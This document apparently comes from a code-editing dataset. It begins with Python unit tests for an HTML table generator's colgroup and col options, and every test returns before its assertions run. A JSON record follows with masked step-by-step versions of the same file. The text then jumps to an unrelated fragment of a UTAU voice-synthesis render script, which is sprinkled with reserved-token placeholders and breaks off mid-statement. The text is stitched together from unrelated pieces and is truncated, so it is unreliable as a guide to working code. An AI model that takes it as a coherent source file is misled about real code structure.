def test_colgroup(self):
return
data = [
['a','b','c'],
[1,2,3],
[4,5,6],
]
gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } )
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate(),
"colgroup present from generate()"
)
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',
gen.generate( { 'tgroups': 2 } ),
"colgroup present from generate() with tgroups"
)
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': None } ),
"colgroup can be overriden"
)
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': 1 } ),
"colgroup yields no-op if scalar"
)
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': [ { 'span': 1, 'color': 'red' }, { 'span': 2, 'color': 'blue' } ] } ),
"can specify multiple colgroups"
)
def test_col(self):
return
data = [
['a','b','c'],
[1,2,3],
[4,5,6],
]
gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } );
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': {} } ),
"colgroup wraps col"
)
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': [{},{},{}] } ),
"colgroup wraps multiple cols"
)
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': None, 'col': {} } ),
"colgroup can be overriden when col is present too"
)
gen = Table( { 'data': data, 'col': [{},{},{}] } );
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': {} } ),
"multiple cols against single colgroup"
)
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': None, 'colgroup': [{},{},{}] } ),
"no cols against multiple colgroups"
)
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': [{},{},{}] } ),
"multiple cols against multiple colgroups"
)
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "24f87bd6aab0ff65cf2153e27df31122818ad0ac",
"index": 766,
"step-1": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n <mask token>\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom Spreadsheet.HTML import Table\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import unittest\nfrom Spreadsheet.HTML import Table\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n\n data = [\n ['a','b','c'],\n [1,2,3],\n [4,5,6],\n ]\n\n gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate(),\n \"colgroup present from generate()\"\n )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',\n gen.generate( { 'tgroups': 2 } ),\n \"colgroup present from generate() with tgroups\"\n )\n\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': None } ),\n \"colgroup can be overriden\"\n )\n\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': 1 } ),\n \"colgroup yields no-op if scalar\"\n )\n\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': [ { 'span': 1, 'color': 'red' }, { 'span': 2, 'color': 'blue' } ] } ),\n \"can specify multiple colgroups\"\n )\n\n\n def test_col(self):\n return\n\n data = [\n ['a','b','c'],\n [1,2,3],\n [4,5,6],\n ]\n\n gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } );\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': {} } ),\n \"colgroup wraps col\"\n )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': [{},{},{}] } ),\n \"colgroup wraps multiple cols\"\n )\n\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': None, 'col': {} } ),\n \"colgroup can be overriden when col is present too\"\n )\n\n\n gen = Table( { 'data': data, 'col': [{},{},{}] } );\n\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': {} } ),\n \"multiple cols against single colgroup\"\n )\n\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': None, 'colgroup': [{},{},{}] } ),\n \"no cols against multiple colgroups\"\n )\n\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': [{},{},{}] } ),\n \"multiple cols against multiple colgroups\"\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
<|reserved_special_token_0|>
shutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))
os.mkdir(os.path.join(os.getcwd(), CACHE_PATH))
<|reserved_special_token_0|>
open(OUTPUT_FILE, 'w+')
for NIndex, Note in enumerate(UstParts):
print('prevnote', PreviousNote)
Rest = False
if Note.lyric in OtoObject.keys():
LocalOto = OtoObject[Note.lyric]
else:
LocalOto = None
Rest = True
Lyric = Note.lyric
Length = Note.length
NoteNum = Note.notenum
PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0
Velocity = Note.velocity
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
PBS = Note.pbs
except KeyError:
PBS = None
try:
PBW = Note['PBW'].split(',')
except KeyError:
PBW = None
try:
PBY = Note['PBY'].split(',')
for Index, Var in enumerate(PBY):
if Var == '':
PBY[Index] = '0'
except KeyError:
PBY = []
try:
PBM = Note.pbm
except KeyError:
PBM = []
try:
VBR = Note.get_by_key('VBR').split(',')
except KeyError:
VBR = None
try:
Flags = Note.get_by_key('Flags')
except KeyError:
Flags = '?'
try:
Modulation = Note.get_by_key('Modulation')
except KeyError:
Modulation = 100
try:
Intensity = Note.get_by_key('Intensity')
except KeyError:
Intensity = 100
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
Envelope = Note.get_by_key('Envelope')
Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')
except (KeyError, TypeError):
Envelope = ['0', '5', '35', '0', '100', '100', '0']
FileOrder = f'{NIndex:05}'
if Rest:
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(
Length)] + ['0'] * 11
PreviousNote = -1
MSPassed += float(Length)
subprocess.call(WavtoolParam)
else:
if PreviousNote == -1:
PrevNote = NoteNum
else:
PrevNote = int(PreviousNote)
if PBS is not None and PBW is not None:
PB = MainFactory()
PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,
PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=
PBM, VBR=VBR)
PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +
PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) /
5)), NoteNum)
else:
PitchBendData = None
if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:
CorrectionRate = PreviousLength // 2 / (PreUtterance - float(
LocalOto['Overlap']))
BitedPreUtterance = PreUtterance * CorrectionRate
BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate
else:
BitedPreUtterance = PreUtterance
BitedOverlap = float(LocalOto['Overlap'])
BitedSTP = PreUtterance - BitedPreUtterance
LengthRequire = Length + float(StartPoint
) - BitedSTP + BitedOverlap + 50
if LengthRequire < float(LocalOto['Consonant']):
LengthRequire = float(LocalOto['Consonant'])
LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 -
LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)
InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])
OutputFile = os.path.join(os.getcwd(), CACHE_PATH,
f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')
Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,
OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[
'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],
LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if
PitchBendData is not None else '', f'{PitchBendData}' if
PitchBendData is not None else '']
print(Parameters)
PreviousNote = NoteNum
PreviousLength = float(Length)
MSPassed += float(Length)
subprocess.call(Parameters)
if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1
].lyric in OtoObject.keys():
NextOto = OtoObject[UstParts[NIndex + 1].lyric]
NextPreUtterance = float(NextOto['PreUtterance'])
NextOverlap = float(NextOto['Overlap'])
WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap
else:
WavtoolCorrection = PreUtterance
sign = '+' if WavtoolCorrection >= 0 else ''
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(
StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'
] + [str(i) for i in Envelope]
subprocess.call(WavtoolParam)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def RandomString(Length):
Letters = string.ascii_lowercase
return ''.join(random.choice(Letters) for i in range(Length))
UST_FILE = 'filet.ust'
OTO_FILE = 'Voice\\NanaMio\\oto.ini'
VB_PATH = 'Voice\\NanaMio'
RESAMPLER_PATH = 'Resampler\\macres.exe'
WAVTOOL_PATH = 'Resampler\\wavtool-yawu.exe'
CACHE_PATH = 'Cache\\'
OUTPUT_FILE = 'temp.wav'
UstObject = utaupy.ust.load(UST_FILE)
OtoObject = Oto(OTO_FILE)
UstParts = UstObject.notes[4:28]
shutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))
os.mkdir(os.path.join(os.getcwd(), CACHE_PATH))
PreviousNote = -1
PreviousLength = 0
Tempo = round(float(UstObject.tempo))
MSPassed = 0
open(OUTPUT_FILE, 'w+')
for NIndex, Note in enumerate(UstParts):
print('prevnote', PreviousNote)
Rest = False
if Note.lyric in OtoObject.keys():
LocalOto = OtoObject[Note.lyric]
else:
LocalOto = None
Rest = True
Lyric = Note.lyric
Length = Note.length
NoteNum = Note.notenum
PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0
Velocity = Note.velocity
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
PBS = Note.pbs
except KeyError:
PBS = None
try:
PBW = Note['PBW'].split(',')
except KeyError:
PBW = None
try:
PBY = Note['PBY'].split(',')
for Index, Var in enumerate(PBY):
if Var == '':
PBY[Index] = '0'
except KeyError:
PBY = []
try:
PBM = Note.pbm
except KeyError:
PBM = []
try:
VBR = Note.get_by_key('VBR').split(',')
except KeyError:
VBR = None
try:
Flags = Note.get_by_key('Flags')
except KeyError:
Flags = '?'
try:
Modulation = Note.get_by_key('Modulation')
except KeyError:
Modulation = 100
try:
Intensity = Note.get_by_key('Intensity')
except KeyError:
Intensity = 100
try:
StartPoint = Note.get_by_key('StartPoint')
except KeyError:
StartPoint = 0
try:
Envelope = Note.get_by_key('Envelope')
Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')
except (KeyError, TypeError):
Envelope = ['0', '5', '35', '0', '100', '100', '0']
FileOrder = f'{NIndex:05}'
if Rest:
WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.
join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(
Length)] + ['0'] * 11
PreviousNote = -1
MSPassed += float(Length)
subprocess.call(WavtoolParam)
else:
if PreviousNote == -1:
PrevNote = NoteNum
else:
PrevNote = int(PreviousNote)
if PBS is not None and PBW is not None:
PB = MainFactory()
PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,
